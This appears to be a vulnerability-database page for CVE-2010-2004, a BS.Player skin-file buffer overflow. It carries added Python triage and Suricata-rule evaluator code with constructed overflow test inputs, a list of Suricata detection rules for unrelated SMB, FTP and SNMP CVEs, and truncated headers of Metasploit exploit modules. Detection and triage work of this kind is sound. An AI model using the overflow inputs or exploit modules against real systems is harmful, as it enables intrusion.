CVE-2010-2004
Published 2010-05-20
Priority: P3 · 47 · critical · 9.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N / AC:M / Au:N / C:C / I:C / A:C
EXPLOIT
EPSS: 9.32% (94.8th percentile)
Stack-based buffer overflow in BS.Global BS.Player 2.51 Build 1022 Free, and possibly other versions, allows user-assisted remote attackers to execute arbitrary code via the Skin parameter in the Options section of a skins file (.bsi), a different vulnerability than CVE-2009-1068.
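The advisory names one trigger: the Skin value in the Options section of a .bsi skin file. As an added example (not BS.Player code and not taken from the advisory), the following Python triage check parses a skin file and flags an over-long Skin value, which is the check a responder would run over downloaded .bsi files before letting BS.Player open them. It assumes the .bsi file is INI-style text with an [Options] section and a Skin= key, which the advisory's wording suggests but does not show, and the 256-byte threshold is a heuristic, not the real stack buffer size, which the advisory does not state. The sample files are constructed.

```python
"""Triage check for BS.Player .bsi skin files (CVE-2010-2004).

Added example, not BS.Player code and not from the advisory. Assumptions:
the .bsi file is INI-style text with an [Options] section holding a
Skin=<value> line (the advisory's wording suggests this but does not show
the format), and MAX_SAFE_SKIN_LEN is a triage heuristic, not the real
stack buffer size, which the advisory does not state.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

MAX_SAFE_SKIN_LEN = 256  # heuristic: a legitimate skin name is a short path

SECTION_RE = re.compile(r"^\s*\[(?P<name>[^\]]+)\]\s*$")
KEY_RE = re.compile(r"^\s*(?P<key>[^=;#\s][^=]*?)\s*=(?P<value>.*)$")


@dataclass
class Finding:
    line_no: int
    key: str
    length: int
    suspicious: bool


def parse_ini(text: str) -> Dict[str, List[Tuple[int, str, str]]]:
    """Return {section (lower-cased): [(line_no, key, value), ...]}.

    Blank lines and ';'/'#' comments are skipped; keys before any section
    header are ignored; values are kept verbatim apart from edge whitespace.
    """
    sections: Dict[str, List[Tuple[int, str, str]]] = {}
    current = None
    for line_no, raw in enumerate(text.splitlines(), start=1):
        if not raw.strip() or raw.lstrip().startswith((";", "#")):
            continue
        m = SECTION_RE.match(raw)
        if m:
            current = m.group("name").strip().lower()
            sections.setdefault(current, [])
            continue
        m = KEY_RE.match(raw)
        if m and current is not None:
            sections[current].append((line_no, m.group("key").strip(), m.group("value").strip()))
    return sections


def check_bsi(data: bytes) -> List[Finding]:
    """Report every Skin key in [Options] with its value length and a verdict."""
    text = data.decode("latin-1")  # never fails, so hostile bytes cannot dodge the check
    findings = []
    for line_no, key, value in parse_ini(text).get("options", []):
        if key.lower() == "skin":
            findings.append(Finding(line_no, key, len(value), len(value) > MAX_SAFE_SKIN_LEN))
    return findings


def is_suspicious(data: bytes) -> bool:
    """True if any Skin value in [Options] exceeds the threshold."""
    return any(f.suspicious for f in check_bsi(data))


# Constructed sample files, not real skins.
BENIGN_BSI = b"; comment line\r\n[Options]\r\nSkin=default.bsz\r\nAuthor=example\r\n"
MALICIOUS_BSI = b"[Options]\r\nSkin=" + b"A" * 2000 + b"\r\n"
OTHER_SECTION_BSI = b"[Other]\r\nSkin=" + b"A" * 3000 + b"\r\n"

if __name__ == "__main__":
    for name, blob in [("benign", BENIGN_BSI), ("malicious", MALICIOUS_BSI)]:
        for f in check_bsi(blob):
            print(name, "line", f.line_no, "Skin length", f.length,
                  "suspicious" if f.suspicious else "ok")
```

The check only looks at Skin inside [Options] because that is the location the advisory names; a long value under another section is reported as clean, which is deliberate so the heuristic does not turn into a generic "long line" alarm. Decoding as latin-1 rather than UTF-8 matters: a decode error on hostile bytes would otherwise let a crafted file escape the check.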
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bsplayer | bs.player | — | — |
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vendor_redhat | — | 5.0 | MEDIUM | — |
The vendor_redhat row is carried over from the Red Hat entry for CVE-2010-0013 (pidgin/libpurple) listed further down this page, not from a Red Hat assessment of CVE-2010-2004. Note also that NVD's own CVSS v2 bands top out at HIGH (7.0 to 10.0); CRITICAL is this page's label for 9.3, not NVD's.
GHSA
GHSA-2cxm-7f99-2c44: Stack-based buffer overflow in BS
ghsa_unreviewed · 2022-05-17 · CVSS 9.3 · CRITICAL · CWE-119 · CVE-2010-2004
Red Hat
pidgin/libpurple: MSN custom smiley request directory traversal file disclosure
vendor_redhat · 2009-12-27 · CVSS 5.0 · MEDIUM · CVE-2010-0013 (a different vulnerability; it does not concern BS.Player)
Directory traversal vulnerability in slp.c in the MSN protocol plugin in libpurple in Pidgin 2.6.4 and Adium 1.3.8 allows remote attackers to read arbitrary files via a .. (dot dot) in an application/x-msnmsgrp2p MSN emoticon (aka custom smiley) request, a related issue to CVE-2004-0122. NOTE: it could be argued that this is resultant from a vulnerability in which an emoticon download request is processed even without a preceding text/x-mms-emoticon message that announced availability of the emoticon.
Suricata
(The Suricata rules in this section reference CVE-2004-0206, CVE-2004-1154, CVE-2001-1021 and CVE-2004-1776 and match SMB, FTP and SNMP traffic; none of them covers CVE-2010-2004, which is triggered by parsing a crafted .bsi skin file.)
GPL NETBIOS SMB-DS NDdeSetTrustedShareW overflow attempt
suricata · 2010-09-23 · CVE-2004-0206
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NDdeSetTrustedShareW overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0C|"; within:2; distance:19; isdataat:256,relative; content:!"|00|"; within:256; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102938; rev:6; metadata:created_at 2010_
Suricata
GPL FTP MDTM overflow attempt
suricata · 2010-09-23 · CVE-2001-1021
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP MDTM overflow attempt"; flow:established,to_server; content:"MDTM"; nocase; isdataat:100,relative; pcre:"/^MDTM\s[^\n]{100}/smi"; reference:bugtraq,9751; reference:cve,2001-1021; reference:cve,2004-0330; reference:nessus,12080; classtype:attempted-admin; sid:2102546; rev:8; metadata:created_at 2010_09_23, cve CVE_2001_1021, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
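The MDTM rule is the one complete, self-contained rule on this page, so it is a good place to see how the payload keywords combine: `content:"MDTM"; nocase;` sets a cursor just past the match, `isdataat:100,relative;` is a cheap pre-check that enough bytes follow the cursor, and the `pcre` with the `m` flag re-anchors `^` at every line so an MDTM that is not the first command in the segment still matches. The following is an added example, not Suricata or Emerging Threats code: a small evaluator for that subset of the rule language (content with nocase/offset/depth/distance/within, isdataat, pcre with s/m/i/R) run over constructed FTP command payloads. It raises NotImplementedError for anything else (flowbits, byte_test, byte_jump, negated content), so it handles this rule and the content/pcre parts of the others here, not the SMB rules in full, and its within/depth handling approximates Suricata's. The rule text is the page's, trimmed to the options that affect matching.

```python
"""Evaluator for the payload-matching subset of the Suricata rule language
used by the MDTM rule: content (nocase, offset, depth, distance, within),
isdataat (relative) and pcre (s, m, i, R). Added example, not Suricata or
Emerging Threats code; flowbits and byte_* keywords raise NotImplementedError."""
import re

# Rule text from the page, with the reference/metadata options trimmed.
MDTM_RULE = (r'alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP MDTM overflow attempt"; '
             r'flow:established,to_server; content:"MDTM"; nocase; isdataat:100,relative; '
             r'pcre:"/^MDTM\s[^\n]{100}/smi"; reference:cve,2001-1021; classtype:attempted-admin; '
             r'sid:2102546; rev:8;)')

OPTION_RE = re.compile(r'\s*(?P<kw>[A-Za-z_]+)(?::(?:"(?P<q>(?:[^"\\]|\\.)*)"|(?P<v>[^;]*)))?\s*;')
NON_PAYLOAD = {"msg", "flow", "reference", "classtype", "sid", "rev", "metadata", "priority", "gid"}
CONTENT_MODS = {"nocase", "offset", "depth", "distance", "within"}


def parse_options(rule):
    """Split the parenthesised option list into (keyword, value) pairs, honouring quotes."""
    body = rule[rule.index("(") + 1:rule.rindex(")")]
    opts, pos = [], 0
    while pos < len(body.rstrip()):
        m = OPTION_RE.match(body, pos)
        if not m:
            raise ValueError("unparseable options near %r" % body[pos:pos + 40])
        opts.append((m.group("kw"), m.group("q") if m.group("q") is not None else m.group("v")))
        pos = m.end()
    return opts


def decode_content(spec):
    """Turn a content string with |hex| runs and backslash escapes into bytes."""
    out = bytearray()
    for i, part in enumerate(spec.split("|")):
        out += bytes.fromhex(part) if i % 2 else re.sub(r"\\(.)", r"\1", part).encode("latin-1")
    return bytes(out)


def match_content(payload, cursor, needle, mods):
    """Return the cursor after the match, or None. distance/within count from the cursor."""
    if "distance" in mods or "within" in mods:
        start = cursor + int(mods.get("distance", 0))
        end = start + int(mods["within"]) if "within" in mods else len(payload)
    else:
        start = int(mods.get("offset", 0))
        end = start + int(mods["depth"]) if "depth" in mods else len(payload)
    hay = payload[start:end]
    if "nocase" in mods:
        hay, needle = hay.lower(), needle.lower()
    idx = hay.find(needle)
    return None if idx < 0 else start + idx + len(needle)


def match_pcre(payload, cursor, spec):
    """pcre:"/body/flags": s, m, i map to re flags; R anchors the search at the cursor."""
    body, flags = spec[1:].rsplit("/", 1)
    re_flags = (re.I if "i" in flags else 0) | (re.S if "s" in flags else 0) | (re.M if "m" in flags else 0)
    start = cursor if "R" in flags else 0
    m = re.compile(body.encode("latin-1"), re_flags).search(payload[start:])
    return None if m is None else start + m.end()


def rule_matches(rule, payload):
    """True if every payload keyword matches in order, each relative keyword from the last match."""
    opts = parse_options(rule)
    cursor, i = 0, 0
    while i < len(opts):
        kw, val = opts[i]
        i += 1
        if kw in NON_PAYLOAD:
            continue
        if kw == "content":
            mods = {}
            while i < len(opts) and opts[i][0] in CONTENT_MODS:  # modifiers follow their content
                mods[opts[i][0]] = opts[i][1]
                i += 1
            cursor = match_content(payload, cursor, decode_content(val), mods)
        elif kw == "isdataat":
            n, *rest = [p.strip() for p in val.split(",")]
            base = cursor if "relative" in rest else 0
            cursor = cursor if base + int(n) < len(payload) else None  # a byte exists at offset n
        elif kw == "pcre":
            cursor = match_pcre(payload, cursor, val)
        else:
            raise NotImplementedError(kw)
        if cursor is None:
            return False
    return True


# Constructed FTP command payloads (client to server), not captured traffic.
BENIGN_MDTM = b"MDTM 20100520120000 readme.txt\r\n"
LONG_MDTM = b"MDTM " + b"A" * 150 + b"\r\n"
SHORT_MDTM = b"MDTM " + b"A" * 98 + b"\r\n"        # 98 bytes + CR = 99, below {100}
BOUNDARY_MDTM = b"MDTM " + b"A" * 99 + b"\r\n"     # 99 bytes + CR = 100: [^\n] counts the CR
LOWERCASE_MDTM = b"mdtm " + b"B" * 100 + b"\r\n"   # nocase and the i flag make this fire too
MIDSTREAM_MDTM = b"USER x\r\nMDTM " + b"A" * 150 + b"\r\n"  # the m flag anchors ^ after \n
```

One detail the boundary payload exposes: `[^\n]` also matches `\r`, so an argument of 99 bytes followed by CRLF already satisfies `{100}` and fires the rule; the effective threshold on the argument itself is one byte lower than the regex suggests.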
Suricata
GPL NETBIOS SMB-DS nddeapi create tree attempt
suricata · 2010-09-23 · CVE-2004-0206
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; flowbits:set,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|5C|nddeapi|00|"; within:9; distance:78; nocase; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102930; rev:6; metadata:created_at 2010_09_23, cve CVE_2004_0206, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_14;)
Suricata
GPL NETBIOS SMB NT Trans NT CREATE unicode DACL overflow attempt
suricata · 2010-09-23 · CVE-2004-1154
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode DACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103036; rev:5; metadata:created_at 2010_09_23, cve CVE_2004_1154, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
GPL NETBIOS SMB nddeapi unicode bind attempt
suricata · 2010-09-23 · CVE-2004-0206
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi unicode bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; flowbits:set,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102933; rev:7; metadata:created_at 2010_09_23, cve CVE_2004
Suricata
GPL NETBIOS SMB-DS nddeapi andx create tree attempt
suricata · 2010-09-23 · CVE-2004-0206
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; flowbits:set,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C|nddeapi|00|"; within:9; distance:51; nocase; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102958; rev:5; metadata:created_at 2010_09_23, cve CVE_2004_0206, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updat
Suricata
GPL NETBIOS SMB NT Trans NT CREATE andx SACL overflow attempt
suricata · 2010-09-23 · CVE-2004-1154
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE andx SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103027; rev:6; metadata:created_at 2010_09_23, cve CVE_2004_1154, confidence Medium, signature_s
Suricata
GPL NETBIOS SMB-DS NT Trans NT CREATE SACL overflow attempt
suricata · 2010-09-23 · CVE-2004-1154
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103030; rev:5; metadata:created_at 2010_09_23, cve CVE_2004_1154, confidence Medium, signature_severity Informational, updated_at 2019_07_26;)
Suricata
GPL NETBIOS SMB NT Trans NT CREATE unicode SACL overflow attempt
suricata · 2010-09-23 · CVE-2004-1154
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103028; rev:5; metadata:created_at 2010_09_23, cve CVE_2004_1154, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
GPL NETBIOS SMB-DS nddeapi unicode bind attempt
suricata · 2010-09-23 · CVE-2004-0206
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi unicode bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; flowbits:set,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102935; rev:8; metadata:created_at 2010_09_23, cve CV
Suricata
GPL NETBIOS SMB nddeapi bind attempt
suricata · 2010-09-23 · CVE-2004-0206
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; flowbits:set,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102932; rev:7; metadata:created_at 2010_09_23, cve CVE_2004_0206, signature_severity Informational
Suricata
GPL NETBIOS SMB NT Trans NT CREATE unicode andx SACL overflow attempt
suricata · 2010-09-23 · CVE-2004-1154
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode andx SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103029; rev:6; metadata:created_at 2010_09_23, cve CVE_2004_1154, confidence Medi
Suricata
GPL NETBIOS SMB NT Trans NT CREATE oversized Security Descriptor attempt
suricata · 2010-09-23 · CVE-2004-1154
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; pcre:"/^.{27}/R"; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; pcre:"/^.{4}/R"; byte_test:4,>,1024,36,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103018; rev:5; metadata:created_at 2010_09_23, cve CVE_2004_1154, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
GPL NETBIOS SMB-DS nddeapi unicode create tree attempt
suricata · 2010-09-23 · CVE-2004-0206
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi unicode create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; flowbits:set,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|5C 00|n|00|d|00|d|00|e|00|a|00|p|00|i|00 00 00|"; within:18; distance:78; nocase; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102931; rev:6; metadata:created_at 2010_09_23, cve CVE_2004_0206, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_14;)
Suricata
GPL NETBIOS SMB-DS NT Trans NT CREATE oversized Security Descriptor attempt
suricata · 2010-09-23 · CVE-2004-1154
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; pcre:"/^.{27}/R"; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; isdataat:4,relative; byte_test:4,>,1024,40,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103022; rev:4; metadata:created_at 2010_09_23, cve CVE_2004_1154, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
GPL NETBIOS SMB NT Trans NT CREATE SACL overflow attempt
suricata · 2010-09-23 · CVE-2004-1154
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103026; rev:5; metadata:created_at 2010_09_23, cve CVE_2004_1154, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
GPL NETBIOS SMB NT Trans NT CREATE unicode oversized Security Descriptor attempt
suricata · 2010-09-23 · CVE-2004-1154
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; pcre:"/^.{27}/R"; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; pcre:"/^.{4}/R"; byte_test:4,>,1024,36,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103020; rev:5; metadata:created_at 2010_09_23, cve CVE_2004_1154, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
ET SNMP Attempted TCP Access Attempt to Cisco IOS 12.1 Hidden Read/Write Community String cable-docsis
suricata · 2010-07-30 · CVE-2004-1776
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 161 (msg:"ET SNMP Attempted TCP Access Attempt to Cisco IOS 12.1 Hidden Read/Write Community String cable-docsis"; flow:established,to_server; content:"cable-docsis"; nocase; reference:url,www.cisco.com/warp/public/707/cisco-sa-20010228-ios-snmp-community.shtml; reference:url,www.iss.net/security_center/reference/vuln/cisco-ios-cable-docsis.htm; reference:url,www.kb.cert.org/vuls/id/840665; reference:cve,2004-1776; classtype:attempted-admin; sid:2011014; rev:3; metadata:created_at 2010_07_30, cve CVE_2004_1776, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_06;)
Exploit-DB
Microsoft WINS - Service Memory Overwrite (MS04-045) (Metasploit)
exploitdb · 2010-09-20 · CVE-2004-1080
---
##
# $Id: ms04_045_wins.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # (Rank and include lines omitted from this excerpt)

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft WINS Service Memory Overwrite',
      'Description'    => %q{
          This module exploits an arbitrary memory write flaw in the
          WINS service. This exploit has been tested against Windows
          2000 only.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 10394 $',
      'References'     =>
        [
          [ 'CVE', '2004-1080'],
          [ 'OSVDB', '12378'],
          [ 'BID', '11763'],
          [ '
Exploit-DB
Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit)
exploitdb · 2010-09-20 · CVE-2004-0608
---
##
# $Id: ut2004_secure.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # (Rank and include lines omitted from this excerpt)

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Unreal Tournament 2004 "secure" Overflow (Linux)',
      'Description'    => %q{
          This is an exploit for the GameSpy secure query in
          the Unreal Engine.

          This exploit only requires one UDP packet, which can
          be both spoofed and sent to a broadcast address.
          Usually, the GameSpy query server listens on port 7787,
          but you can manually specify the port as well.

          The RunServe
Exploit-DB
IPSwitch IMail IMAP4D - Delete Overflow (Metasploit)
exploitdb · 2010-09-20 · CVE-2004-1520
---
##
# $Id: imail_delete.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # (Rank and include lines omitted from this excerpt)

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'IMail IMAP4D Delete Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in the 'DELETE'
          command of the IMail IMAP4D service. This vulnerability
          can only be exploited with a valid username and password.
          This flaw was patched in version 8.14.
      },
      'Author'         => [ 'spoonm' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 10394 $',
      'References'     =>
        [
          [ 'CVE',
Exploit-DB
Proxy-Pro Professional GateKeeper 4.7 - GET Overflow (Metasploit)
exploitdb · 2010-09-20 · CVE-2004-0326
---
##
# $Id: proxypro_http_get.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # (Rank and include lines omitted from this excerpt)

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Proxy-Pro Professional
          GateKeeper 4.7. By sending a long HTTP GET to the default port
          of 3128, a remote attacker could overflow a buffer and execute
          arbitrary code.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'Version'        => '$Revis
Exploit-DB
WebSTAR FTP Server - USER Overflow (Metasploit)
exploitdb · 2010-09-20 · CVE-2004-0695
---
##
# $Id: webstar_ftp_user.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # (Rank and include lines omitted from this excerpt)

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WebSTAR FTP Server USER Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the logging routine
          of the WebSTAR FTP server. Reliable code execution is
          obtained by a series of hops through the System library.
      },
      'Author'         => [ 'ddz', 'hdm' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 10394 $',
      'References'     =>
        [
          [ 'CVE', '2004-0695'],
          [ 'OSVDB',
Exploit-DB
eshtery CMS - SQL Injection
exploitdb · 2010-09-12 · CVE-2010-3404
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
